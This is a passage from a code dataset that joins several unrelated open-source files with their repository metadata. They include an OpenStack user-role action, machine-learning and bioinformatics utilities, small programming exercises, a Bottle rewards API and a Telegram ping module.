_submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n if self.action.state == \"default\":\n user = self._get_target_user()\n self._user_roles_edit(user, self.roles, self.project_id, remove=self.remove)\n self._user_roles_edit(\n user,\n self.inherited_roles,\n self.project_id,\n remove=self.remove,\n inherited=True,\n )\n\n if self.remove and self.roles:\n self.add_note(\n \"User %s has had roles %s removed from project %s.\"\n % (self.user_id, self.roles, self.project_id)\n )\n if self.remove and self.inherited_roles:\n self.add_note(\n \"User %s has had inherited roles %s \"\n \"removed from project %s.\"\n % (self.user_id, self.inherited_roles, self.project_id)\n )\n if self.roles:\n self.add_note(\n \"User %s has been given roles %s in project %s.\"\n % (self.user_id, self.roles, self.project_id)\n )\n if self.inherited_roles:\n self.add_note(\n \"User %s has been given inherited roles %s in project %s.\"\n % (self.user_id, self.inherited_roles, self.project_id)\n )\n elif self.action.state == \"complete\":\n if self.remove:\n self.add_note(\n \"User %s didn't have roles %s in project %s.\"\n % (self.user_id, self.roles, self.project_id)\n )\n else:\n self.add_note(\n \"User %s already had roles %s in project %s.\"\n % (self.user_id, self.roles, self.project_id)\n )\n\n\nclass UpdateUserEmailAction(UserIdAction, UserMixin):\n \"\"\"\n Simple action to update a users email address for a given user.\n \"\"\"\n\n required = [\n \"user_id\",\n \"new_email\",\n ]\n\n serializer = serializers.UpdateUserEmailSerializer\n\n def _get_email(self):\n # Sending to new email address\n return self.new_email\n\n def _validate(self):\n self.action.valid = validate_steps(\n [\n self._validate_user,\n self._validate_email_not_in_use,\n ]\n )\n self.action.save()\n\n def _validate_user(self):\n self.user = self._get_target_user()\n if self.user:\n return True\n self.add_note(\"Unable to find target user.\")\n return False\n\n def _validate_email_not_in_use(self):\n if CONF.identity.username_is_email:\n self.domain_id = self.action.task.keystone_user[\"project_domain_id\"]\n\n id_manager = user_store.IdentityManager()\n\n if id_manager.find_user(self.new_email, self.domain_id):\n self.add_note(\"User with same username already exists\")\n return False\n self.add_note(\"No user with same username\")\n return True\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve(True)\n\n def _approve(self):\n self._validate()\n self.action.need_token = True\n self.set_token_fields([\"confirm\"])\n\n def _submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n if token_data[\"confirm\"]:\n self.old_username = str(self.user.name)\n self.update_email(self.new_email, user=self.user)\n\n if CONF.identity.username_is_email:\n self.update_user_name(self.new_email, user=self.user)\n\n self.add_note(\n \"The email for user %s has been changed to %s.\"\n % (self.old_username, self.new_email)\n )\n","repo_name":"openstack/adjutant","sub_path":"adjutant/actions/v1/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":16101,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"1782936217","text":"\n# Code from Chapter 6 of Machine Learning: An Algorithmic Perspective (2nd Edition)\n# by Stephen Marsland (http://stephenmonika.net)\n\n# You are free to use, change, or redistribute the code in any way you wish for\n# non-commercial purposes, but please maintain the name of the original author.\n# This code comes with no warranty of any kind.\n\n# Stephen Marsland, 2008, 2014\n\n# Demonstration of PCA and kernel PCA on the circular dataset\nimport pylab as pl\nimport numpy as np\n\nimport pca\nimport kernelpca\n\ndata = np.zeros((150,2))\n\ntheta = np.random.normal(0,np.pi,50)\nr = np.random.normal(0,0.1,50)\ndata[0:50,0] = r*np.cos(theta)\ndata[0:50,1] = r*np.sin(theta)\n\ntheta = np.random.normal(0,np.pi,50)\nr = np.random.normal(2,0.1,50)\ndata[50:100,0] = r*np.cos(theta)\ndata[50:100,1] = r*np.sin(theta)\n\ntheta = np.random.normal(0,np.pi,50)\nr = np.random.normal(5,0.1,50)\ndata[100:150,0] = r*np.cos(theta)\ndata[100:150,1] = r*np.sin(theta)\n\npl.figure()\npl.plot(data[:50,0],data[:50,1],'ok')\npl.plot(data[50:100,0],data[50:100,1],'^k')\npl.plot(data[100:150,0],data[100:150,1],'vk')\npl.title('Original dataset')\n\nx,y,evals,evecs = pca.pca(data,2)\npl.figure()\npl.plot(x[:50,0],x[:50,1],'ok')\npl.plot(x[50:100,0],x[50:100,1],'^k')\npl.plot(x[100:150,0],x[100:150,1],'vk')\npl.title('Reconstructed points after PCA')\n\npl.figure()\ny = kernelpca.kernelpca(data,'gaussian',2)\npl.plot(y[:50,0],y[:50,1],'ok')\npl.plot(y[50:100,0],y[50:100,1],'^k')\npl.plot(y[100:150,0],y[100:150,1],'vk')\npl.title('Reconstructed points after kernel PCA')\n\npl.show()\n","repo_name":"alexsosn/MarslandMLAlgo","sub_path":"Ch6/kpcademo.py","file_name":"kpcademo.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"61"} +{"seq_id":"28374952741","text":"class Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if len(s) != len(t):\n return False\n if s == t:\n return True\n ss = list(s)\n ss.sort()\n tt = list(t)\n tt.sort()\n return ss == tt\n","repo_name":"guodongxiaren/OJ","sub_path":"leetcode/242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"70994857153","text":"import os\n# from typing_extensions import Self\nfrom pandas import wide_to_long\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2' # kill warning about tensorflow\nimport tensorflow as tf\n\"\"\"pip install 'h5py==2.10.0' --force-reinstall\"\"\"\n\nimport numpy as np\nimport sys\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import load_model, clone_model\nfrom tensorflow.keras import backend as K\nfrom pathlib import Path\n\nclass TrainModel:\n def __init__(self, num_layers, width, batch_size, learning_rate, input_dim, output_dim, opt, retrain=None, \n path=None, build=True):\n self._input_dim = input_dim\n self._num_layers = num_layers\n self._width = width\n self._output_dim = output_dim\n self._batch_size = batch_size\n self._learning_rate = learning_rate\n self._opt = opt\n if build:\n self._model = self._build_model(num_layers, width, opt, retrain, path)\n else:\n self._model = None\n\n def change_lr(self,decay,change=False):\n new_lr = self._learning_rate*decay\n if change:\n if new_lr < 0.00001:\n learning_rate = 0.00001\n else:\n learning_rate = new_lr\n self._learning_rate = learning_rate\n K.set_value(self._model.optimizer.learning_rate, learning_rate)\n \n\n def clone(self):\n instance = TrainModel(num_layers=self._num_layers, width=self._width, batch_size=self._batch_size, \n learning_rate=self._learning_rate, input_dim=self._input_dim, output_dim=self._output_dim, opt=self._opt, build=False)\n instance._model = clone_model(self._model)\n return instance\n\n def _build_model(self, num_layers, width, opt, retrain, path, moment = 0.9):\n \"\"\"\n Build and compile a fully connected deep neural network\n \"\"\"\n if retrain:\n model = load_model(path)\n # self._model.save(os.path.join(path, 'trained_model_epi{}.h5'.format(epi)))\n else:\n inputs = keras.Input(shape=(self._input_dim,))\n x = layers.Dense(width, activation='relu')(inputs)\n for _ in range(num_layers):\n x = layers.Dense(width, activation='relu')(x)\n outputs = layers.Dense(self._output_dim)(x)\n model = keras.Model(inputs=inputs, outputs=outputs, name='my_model')\n\n if opt == \"adam\":\n model.compile(loss=losses.mean_squared_error, optimizer=Adam(lr=self._learning_rate))\n elif opt == \"rmsprop\":\n model.compile(loss=losses.mean_squared_error, optimizer=RMSprop(lr=self._learning_rate))\n elif opt == \"sgd\":\n model.compile(loss=losses.mean_squared_error, optimizer=SGD(lr=self._learning_rate, momentum=moment))\n \n return model\n \n def predict_one(self, state):\n \"\"\"\n Predict the action values from a single state\n \"\"\"\n state = np.reshape(state, [1, self._input_dim])\n return self._model.predict(state,verbose=0)\n\n\n def predict_batch(self, states):\n \"\"\"\n Predict the action values from a batch of states\n \"\"\"\n return self._model.predict(states, verbose=0)\n\n\n def train_batch(self, states, q_sa):\n \"\"\"\n Train the nn using the updated q-values\n \"\"\"\n self._model.fit(states, q_sa, epochs=1, verbose=0)\n \"\"\"loss = self._model.train_on_batch(states, q_sa)\n print(\"loss\", loss)\"\"\"\n\n def save_model(self, path, epi):\n \"\"\"\n Save the current model in the folder as h5 file and a model architecture summary as png\n \"\"\"\n self._model.save(os.path.join(path, 'trained_model_epi{}.h5'.format(epi)))\n # plot_model(self._model, to_file=os.path.join(path, 'model_structure.png'), show_shapes=True, show_layer_names=True)\n\n\n @property\n def input_dim(self):\n return self._input_dim\n\n\n @property\n def output_dim(self):\n return self._output_dim\n\n\n @property\n def batch_size(self):\n return self._batch_size\n\n\nclass TestModel:\n def __init__(self, input_dim, model_path, epi):\n self._input_dim = input_dim\n self._model = self._load_my_model(model_path, epi)\n\n\n def _load_my_model(self, model_folder_path, epi):\n \"\"\"\n Load the model stored in the folder specified by the model number, if it exists\n \"\"\"\n model_file_path = str(Path(os.path.join(model_folder_path, 'trained_model_epi{}.h5'.format(epi))))\n print(\"model_file_path\",model_file_path)\n if os.path.isfile(model_file_path):\n loaded_model = load_model(model_file_path)\n return loaded_model\n else:\n sys.exit(\"Model number not found\")\n\n\n def predict_one(self, state):\n \"\"\"\n Predict the action values from a single state\n \"\"\"\n state = np.reshape(state, [1, self._input_dim])\n return self._model.predict(state)\n\n\n @property\n def input_dim(self):\n return self._input_dim","repo_name":"linlyu97/Reinforcement-Learning-Approach-for-Intelligent-Traffic-Light-Control","sub_path":"sumo_rl/agents/deep_q/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13277838839","text":"import os\nimport sys\nimport logging\nimport datetime\nimport subprocess\nimport shutil\nimport math\nimport tempfile\n\ndef init_logging(log_heading, logging_level):\n \"\"\"\n Initialize the logging environment and print a header to the log.\n\n :param log_heading: heading for the log\n :return: nothing\n \"\"\"\n logging.basicConfig(format='%(levelname)s\\t%(message)s', level=logging_level, stream=sys.stdout)\n length = math.ceil((len(log_heading)/2))\n logging.info('- ' * length)\n logging.info(log_heading)\n logging.info(datetime.datetime.today().ctime())\n logging.info('- ' * length)\n\n\ndef merge_dicts(dict1, dict2):\n \"\"\"\n Merge two dictionaries into a new dictionary. Keys in the second dictionary\n overwrite existing keys in the first dictionary.\n\n :param dict1: first dictionary\n :param dict2: second dictionary\n :return: a new dictionary\n \"\"\"\n new_dict = {}\n new_dict.update(dict1)\n new_dict.update(dict2)\n return new_dict\n\n\ndef concat_files(file1, file2, new_file):\n \"\"\"\n Concatenates two files into a new file.\n\n :param file1: path to first file\n :param file2: path to second file\n :param new_file: path to new concatenated file\n :return: nothing\n \"\"\"\n with open(new_file, 'wb') as nf:\n with open(file1, 'rb') as f1:\n shutil.copyfileobj(f1, nf)\n with open(file2, 'rb') as f2:\n shutil.copyfileobj(f2, nf)\n\n\ndef can_i_run_software(software):\n \"\"\"\n Copied and modified from wgd.utils\n\n Test if external software is executable\n :param software: list or string of executable(s)\n :return: 1 (failure) or 0 (success)\n \"\"\"\n if type(software) == str:\n software = [software]\n ex = 0\n for s in software:\n # codeml needs input otherwise it prompts the user for input, so a dummy\n # file is created\n if s == 'codeml':\n tmp_file = \"codeml.ctl\"\n command = ['codeml', tmp_file]\n elif s == 'prank':\n command = [s, '--help']\n elif s == 'FastTree':\n command = s\n elif s in ['blastp', 'makeblastdb', 'blast', 'muscle', 'i-adhore']:\n command = [s, '-version']\n else:\n command = [s, '--version']\n try:\n # logging.info(command)\n if s == \"codeml\":\n # Since the Nextflow pipeline processes multiple wgd runs at the same time,\n # let's generate for each run the dummy \"codeml.ctl\" files within a different\n # temporary directory named with a unique ID. This way, the several parallel\n # wgd runs will not interfere with each other when creating and removing \n # the dummy codeml.ctl file.\n with tempfile.TemporaryDirectory(dir = \".\") as tmp_dir:\n with open(os.path.join(tmp_dir, tmp_file), 'w') as o: # write the codeml.ctl file in it\n o.write('seqfile = test')\n sp = subprocess.run(command, cwd=tmp_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # tmp_dir is removed both if the subprocess succeeds or fails, thanks to the \"with\" statement\n else:\n sp = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \n out = sp.stdout.decode(\"utf-8\").strip()\n err = sp.stderr.decode(\"utf-8\").strip()\n if out:\n logging.info(out.splitlines()[0])\n elif err:\n logging.info(err.splitlines()[0])\n\n except FileNotFoundError:\n logging.error('{} executable not found!'.format(s))\n ex = 1\n return ex\n\n\ndef translate_cds(sequence_dict, skip_invalid=False):\n \"\"\"\n Copied and modified from wgd.utils\n\n Just another CDS to protein translater. Will give warnings when in-frame\n stop codons are found, invalid codons are found, or when the sequence length\n is not a multiple of three. Will translate the full sequence or until an\n unspecified or in-frame codon is encountered.\n :param sequence_dict: dictionary with gene IDs and CDS sequences\n :param skip_invalid: bool, skip invalid CDS? (default translates to first\n stop codon or end)\n :return: dictionary with gene IDs and proteins sequences\n \"\"\"\n # TODO I should just use the Biopython translator\n aa_dict = {\n 'ATA': 'I', 'ATC': 'I', 'ATT': 'I', 'ATG': 'M',\n 'ACA': 'T', 'ACC': 'T', 'ACG': 'T', 'ACT': 'T',\n 'AAC': 'N', 'AAT': 'N', 'AAA': 'K', 'AAG': 'K',\n 'AGC': 'S', 'AGT': 'S', 'AGA': 'R', 'AGG': 'R',\n 'CTA': 'L', 'CTC': 'L', 'CTG': 'L', 'CTT': 'L',\n 'CCA': 'P', 'CCC': 'P', 'CCG': 'P', 'CCT': 'P',\n 'CAC': 'H', 'CAT': 'H', 'CAA': 'Q', 'CAG': 'Q',\n 'CGA': 'R', 'CGC': 'R', 'CGG': 'R', 'CGT': 'R',\n 'GTA': 'V', 'GTC': 'V', 'GTG': 'V', 'GTT': 'V',\n 'GCA': 'A', 'GCC': 'A', 'GCG': 'A', 'GCT': 'A',\n 'GAC': 'D', 'GAT': 'D', 'GAA': 'E', 'GAG': 'E',\n 'GGA': 'G', 'GGC': 'G', 'GGG': 'G', 'GGT': 'G',\n 'TCA': 'S', 'TCC': 'S', 'TCG': 'S', 'TCT': 'S',\n 'TTC': 'F', 'TTT': 'F', 'TTA': 'L', 'TTG': 'L',\n 'TAC': 'Y', 'TAT': 'Y', 'TAA': '', 'TAG': '',\n 'TGC': 'C', 'TGT': 'C', 'TGA': '', 'TGG': 'W',\n }\n protein_dict = {}\n\n j = 0\n total = 0\n for key, val in sequence_dict.items():\n j += 1\n aa_seq = ''\n if len(val) % 3 != 0:\n logging.warning('Sequence length != multiple of 3 for {}!'.format(key))\n total += 1\n invalid = False\n for i in range(0, len(val), 3):\n if val[i:i + 3] not in aa_dict.keys():\n logging.warning('Invalid codon {0:>3} in {1}'.format(val[i:i+3], key))\n invalid = True\n total += 1\n break\n else:\n if aa_dict[val[i:i + 3]] == '' and i+3 != len(val):\n logging.warning('In-frame STOP codon in {0} at position {1}:{2}'.format(key, i, i+3))\n invalid = True\n total += 1\n break\n aa_seq += aa_dict[val[i:i + 3]]\n if invalid and skip_invalid:\n continue\n protein_dict[key] = aa_seq\n\n if total:\n logging.warning(\"There were {} warnings during translation\".format(total))\n return protein_dict\n\n\ndef write_fasta(seq_dict, output_file, id_prefix=None, append=False):\n \"\"\"\n Copied and modified from wgd.utils\n\n Write/append a sequence dictionary to a fasta file.\n :param seq_dict: sequence dictionary, see :py:func:`read_fasta`\n :param output_file: output file name\n :param id_prefix: prefix to add to gene IDs\n :param append: append to file\n :return: nothing\n \"\"\"\n mode = 'w'\n if append:\n mode = 'a'\n with open(output_file, mode) as o:\n for key, val in seq_dict.items():\n if id_prefix and id_prefix != '':\n o.write('>' + id_prefix + '|' + key + '\\n')\n else:\n o.write('>' + key + '\\n')\n o.write(val + '\\n')\n","repo_name":"altingia/ksrates","sub_path":"ksrates/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"4019727773","text":"import json\nfrom random import*\nfrom Armory import *\n\n#Einsamer Wolf - Band 2\n#Kaidisziplinen\n#0-Tarnung, 1-Jagt, 2-6.Sinn, 3-Spurensuche, 4-Heilkraft, 5-Waffenstärke, 6-Gedankensperre, 7-Denkstrahl,8-Tierverständnis, 9-Geist_gegen_Materie\n#Waffenstärke: 0-Dolch, 1-Speer, 2-Streitkolben, 3-Kurzschwert, 4-Kampfhammer, 5-Schwert, 6-Streitaxt, 7-Schwert, 8-Schlagstock, 9-Breitschwert\n\n@dataclass()\nclass Charakter:\n head: Equippable\n body: Equippable\n main_hand: Weapon\n off_hand: Equippable\n page: int\n fighting_power: int\n endurance_points: int\n endurance_points_max: int\n kai_discipline_max: int\n food_rations: int\n wallet: int\n backpack: []\n special_items: []\n kai_disciplines: []\n\n @classmethod\n def crate_random(cls):\n ausdauerpunkte = randint(21,31)\n return cls(\n head = Helm,\n body = None,\n main_hand = Weapon(BodyPart.MainHand, 2, 0, WeaponType.Broadsword),\n off_hand= None,\n page = 0,\n fighting_power = randint(11,21),\n endurance_points = ausdauerpunkte,\n endurance_points_max = ausdauerpunkte,\n kai_discipline_max = 5,\n food_rations = 0,\n wallet = randint(11,21),\n backpack = [],\n special_items = [],\n kai_disciplines = []\n )\n\n @classmethod\n def from_json(cls, character_as_json: str):\n return cls(\n head = character_as_json['head'],\n body = character_as_json['body'],\n main_hand = character_as_json['main_hand'],\n off_hand= character_as_json['off_hand'],\n page = character_as_json[\"page\"],\n fighting_power = character_as_json[\"fighting_power\"],\n endurance_points = character_as_json[\"endurance_points\"],\n endurance_points_max = character_as_json[\"endurance_points_max\"],\n kai_discipline_max = character_as_json[\"kai_discipline_max\"],\n food_rations = character_as_json[\"food_rations\"],\n wallet = character_as_json[\"wallet\"],\n backpack = character_as_json[\"backpack\"],\n special_items = character_as_json[\"special_items\"],\n kai_disciplines = list(map(lambda x: WeaponType[x], character_as_json[\"kai_disciplines\"])),\n )\n\n def to_json(self):\n def convert(o):\n try:\n if(isinstance(o, Enum)):\n return o.value\n return o.__dict__\n except:\n return None\n\n return json.dumps(self, default=convert, indent=4, ensure_ascii=False)\n\n\n#TODO: I don't get this.\nwaffenstaerke = [0,0,1,0,0,0,0,0,0,0]\nkai = [1,1,1,0,1,waffenstaerke,1,0,0,0]\n\n#KAMPFSTÄRKE\n# kampfstaerke=16\n# kwolf = kampfstaerke\n\n#AUSDAUER\nausdauer=23\n\n\n#Waffen: 0-Dolch, 1-Speer, 2-Streitkolben, 3-Kurzschwert, 4-Kampfhammer, 5-Schwert, 6-Streitaxt, 7-Schwert, 8-Schlagstock, 9-Breitschwert\n# waffen = [0,0,0,0,0,0,0,0,0,0]\n\n#Rucksack\n# gegenstaende = [] #maximal 8\n# mahlzeiten = 2\n\n# besondere_gegenstände = ['Karte','Schild']\n# tragbeutel = 13\n\n\n\n","repo_name":"OttoBuck/einsamer-Wolf","sub_path":"Charakter.py","file_name":"Charakter.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15696977425","text":"roll_list=[]\n\nnum = int(input(\"Enter the number of students: \"))\n\nfor i in range(0, num):\n roll = int(input(\"Enter the roll no.: \"))\n roll_list.append(roll)\n\n\ndef linear_search():\n\n count = 0\n value = int(input(\"Enter the roll no. to be searched: \"))\n\n for i in range(num):\n if roll_list[i] == value:\n print(\"The value\",roll_list[i],\"is found at index no.:\",i)\n count+=1\n\n if count==0:\n print(\"Roll no. does not exist\")\n\ndef sentinal_search():\n\n value = int(input(\"Enter the roll no. to be searched: \"))\n last = roll_list[num-1]\n roll_list[num-1]=value\n\n i = 0\n\n while(roll_list[i]!=value):\n i+=1\n\n roll_list[num-1] = last\n\n if(i 2000):\n n = int(input())\n return n\n\ndef lerLed():\n n = None\n try:\n n = float(input())\n except :\n pass\n if (n is None or int(n) < 1 or int(n) > 10**100):\n return lerLed()\n return n\n\nqtdTestes = lerQuantidadeDeTestes()\n\nfor i in range(qtdTestes):\n meuLedLido = input()\n soma = 0\n for letraDoLed in meuLedLido: #letra do led aqui é uma string\n quantidadeDeLedsDestaLetra = leds[int(letraDoLed)] #buscando no meu array(banco de dados) a quantidade de leds que vou precisar pra construir a letra\n soma = soma + quantidadeDeLedsDestaLetra #é preciso reconverter para int, para usá-lo como índice\n print(str(soma) + ' leds')","repo_name":"nataliaRabelo/URI-Beecrowd","sub_path":"1168.py","file_name":"1168.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19462794567","text":"import db_compute\nimport payout\n\n#import os\nimport json\nfrom bottle import post, request, response, get, route, static_file\nfrom threading import Thread\nimport datetime\nimport time\n\n@route('/monitor_nodes/', method='GET')\n@route('/monitor_nodes', method='GET')\ndef get_control_panel_index():\n return static_file(\"control_panel.html\", root=\"monitor_nodes/\")\n\ndef setHeaders():\n response.content_type = 'application/json'\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n# List of rewards for last 3 days\n@route('/monitor_nodes/rewards/last3', method='GET')\ndef getRewards3():\n period_day = 24 * 3600\n start0 = int(time.time()) - 3 * period_day\n start = int(start0 / period_day) * period_day\n\n nodes = db_compute.get_all_daily_sorted_filter_time_rev(start)\n ret = []\n try:\n for n in nodes:\n time_start = int(n['time_start'])\n dat = datetime.datetime.utcfromtimestamp(time_start).isoformat()\n ret.append({\n 'date': dat,\n 'time_start': time_start,\n 'time_end': n['time_end'],\n 'ip': n['ip'],\n 'port': n['port'],\n 'account': n['account'],\n 'net_version': n['net_version'],\n 'count_pos': n['count_pos'],\n 'count_neg': n['count_neg'],\n 'count_nonempty': n['count_nonempty'],\n 'avg_bal': 0.001 * int(1000 * float(n['avg_bal'])),\n 'eligible': n['eligible'],\n 'deny_reason': n['deny_reason'],\n 'reward_elig': n['reward_elig'],\n 'reward_sent': n['reward_sent'],\n 'sent_hash': n['sent_hash'],\n 'sent_time': n['sent_time'],\n })\n except:\n ret = ['ERROR']\n setHeaders()\n return json.dumps(ret)\n\n# List of periods for last 6 10-min-periods\n@route('/monitor_nodes/periods/last6', method='GET')\ndef getPeriods6():\n period = 600\n now = int(time.time())\n start = int((now - 6 * period) / period) * period\n end = int((now + period) / period) * period\n ret = []\n try:\n nodes = db_compute.get_nodes_period_filter_time(start, end)\n for n in nodes:\n time_start = int(n['time_start'])\n dat = datetime.datetime.utcfromtimestamp(time_start).isoformat()\n ret.append({\n 'date': dat,\n 'time_start': time_start,\n 'time_end': n['time_end'],\n 'count_tot': n['count_tot'],\n 'ip': n['ip'],\n 'port': n['port'],\n 'count': n['count'],\n 'account': n['account'],\n 'avg_bal': 0.001 * int(1000 * float(n['avg_bal'])),\n 'net_version': n['net_version'],\n })\n except:\n ret = ['ERROR']\n setHeaders()\n return json.dumps(ret)\n\n# TODO reward for ip/account for last 10 dasy\n# TODO period for ip for last 3 days\n\n# Sample send callback, used for testing\n# Example: curl -d \"{'id': '1234500017', 'amount': '3', 'block_hash': 'D70BB005723EF4AE3850861FB8819628CD101EE1F3A4FF40808213EB5B99FECF'}\" http://localhost:8090/treasury/sample-send-callback\n@route('/monitor_nodes/send-callback', method='POST')\ndef send_callback():\n global config\n setHeaders()\n postdata = request.body.read().decode('utf8')\n #print(\"postdata \", postdata)\n postjson = json.loads(postdata.replace(\"'\", '\"'))\n #print(\"postjson \", postjson)\n\n if 'error' in postjson:\n print('Send callback', 'ERROR', postjson['error'])\n else:\n id = ''\n if 'id' in postjson:\n id = postjson['id']\n amount = 0\n if 'amount' in postjson:\n amount = postjson['amount']\n block_hash = ''\n if 'block_hash' in postjson:\n block_hash = postjson['block_hash']\n #print('Send callback', 'id', id, 'amount', amount, 'block_hash', block_hash)\n payout.payout_callback(id, amount, block_hash)\n","repo_name":"mikroncoin/mikron_restapi_py","sub_path":"monitor_nodes/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71317134273","text":"# виведіть на екран транспоновану матрицю 3*3 (початкова матриця задана користувачем)\r\nimport numpy as np\r\n\r\nwhile True:\r\n while True:\r\n try:\r\n n, m = int(input('Введіть кількість рядків: ')), \\\r\n int(input('Введіть кількість стовпчиків: '))\r\n while n != 3 or m != 3: # Перевірка розмірності 3 на 3.\r\n print('Розмірність матриці не 3 на 3,введіть нову')\r\n n, m = int(input('Введіть кількість рядків: ')), \\\r\n int(input('Введіть кількість стовпчиків: '))\r\n break\r\n except ValueError: # Перевірка на правильність вводу(числа)\r\n print('Введіть числа! ')\r\n A = np.zeros((n, m), dtype=int) # Ініціалізуємо матрицю нулями,як початкову\r\n for i in range(n): # Створюємо послідовність циклу рядків та стовпчиків\r\n for j in range(m):\r\n A[i, j] = int(input(f' [{i + 1}, {j + 1}]: '))\r\n print('Ваша матриця: ', A)\r\n\r\n T = np.zeros((n, m), dtype=int) # Ініціалізуємо нульову матрицю,пізніше стане транспортованою Т\r\n for i in range(m): # цикл для присвоєння введеної матриці майбутній транспортованій\r\n for j in range(n):\r\n T[i, j] = A[j, i] # Перестановкою індексів ми отримаємо транспоновану матрицю.\r\n print('Транспонована матриця: ', T)\r\n print('Хочете повторити дії? Введіть yes чи інше')\r\n answer = input('')\r\n if answer == 'yes':\r\n continue\r\n else:\r\n break\r\n","repo_name":"tomasolodun/lab8","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23993155249","text":"import logging\nimport time\n\nfrom telethon.tl.types import Message\n\nfrom .. import loader\nfrom ..inline.types import InlineCall, InlineQuery\n\nlogger = logging.getLogger(__name__)\n\n\n@loader.tds\nclass PingerMod(loader.Module):\n \"\"\"Inline Pinger For Test\"\"\"\n\n strings = {\n \"name\": \"InlinePing\",\n \"results_ping\": \"✨ Telegram ping: {} ms\"\n }\n\n strings_ru = {\"results_ping\": \"✨ Скорость отклика Telegram: {} ms\"}\n\n @loader.command(ru_doc=\"Проверить скорость отклика юзербота\")\n async def iping(self, message: Message):\n \"\"\"Test your userbot ping\"\"\"\n start = time.perf_counter_ns()\n\n await self.inline.form(\n self.strings(\"results_ping\").format(\n round((time.perf_counter_ns() - start) / 10**3, 3),\n ),\n reply_markup=[[{\"text\": \"⏱️ Проверить ещё раз\", \"callback\": self.ladno}]],\n message=message,\n )\n\n async def ladno(self, call: InlineCall):\n start = time.perf_counter_ns()\n await call.edit(\n\t\t\tself.strings(\"results_ping\").format(\n round((time.perf_counter_ns() - start) / 10**3, 3),\n ),\n\t\t\treply_markup=[[{\"text\": \"⏱️ Проверить ещё раз\", \"callback\": self.ladno,}],]\n\t\t)\n\n async def ping_inline_handler(self, query: InlineQuery):\n \"\"\"Test your userbot ping\"\"\"\n start = time.perf_counter_ns()\n ping = self.strings(\"results_ping\").format(\n round((time.perf_counter_ns() - start) / 10**3, 3),\n )\n button = [{\n \"text\": \"⏱️ Проверить ещё раз\", \n \"callback\": self.ladno\n }]\n return {\n \"title\": \"Пинг\",\n \"description\": \"Нажми сюда\",\n \"thumb\": \"https://te.legra.ph/file/5d8c7f1960a3e126d916a.jpg\",\n \"message\": ping,\n \"reply_markup\": button,\n }","repo_name":"drenix-drenix/modules","sub_path":"InlinePing.py","file_name":"InlinePing.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32074057815","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 14 14:50:50 2023\n\n@author: phili\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Plotting_obs:\n def __init__(self,obs_obj):\n #INPUT:\n #obs_obj is created with the class Observations in the file get_observations.py\n self.obs_obj = obs_obj\n self.obs_dic = obs_obj.data_dic\n self.nights = obs_obj.get_dates()\n \n def plot_vis(self,axis,units,night = None):\n formatted_night = f'{night.day}/{night.month}/{night.year}'\n night_dic = self.obs_obj.get_data_by_night(night)\n \n baselines = night_dic['baselines']\n vis2 = night_dic['Vis2']\n vis2_err = night_dic['Vis2_err']\n \n if units == 'm':\n im1 = axis.scatter(baselines,vis2, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n axis.set_ylim(0.85,1.15)\n axis.set_title(f'Vis2 for the night of the {formatted_night}')\n axis.errorbar(baselines,vis2, yerr=vis2_err,ecolor='darkgrey', linestyle='', marker=None, mew=0)#,**error_kwargs )\n axis.set_xlabel(r'B (m)')\n axis.set_ylabel(r'Vis2')\n else:\n freqs = baselines/np.array(night_dic['wave_vis'])\n im1 = axis.scatter(freqs,vis2, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n axis.set_ylim(0.85,1.15)\n axis.set_title(f'Vis2 for the night of the {formatted_night}')\n axis.errorbar(freqs,vis2, yerr=vis2_err,ecolor='darkgrey', linestyle='', marker=None, mew=0)#,**error_kwargs )\n axis.set_xlabel(r'f ($\\lambda . rad^{-1})$')\n axis.set_ylabel(r'Vis2')\n\n\n return im1\n \n def plot_uv_plane(self,axis,units,night = None):\n formatted_night = f'{night.day}/{night.month}/{night.year}'\n night_dic = self.obs_obj.get_data_by_night(night)\n \n B_u, B_v = 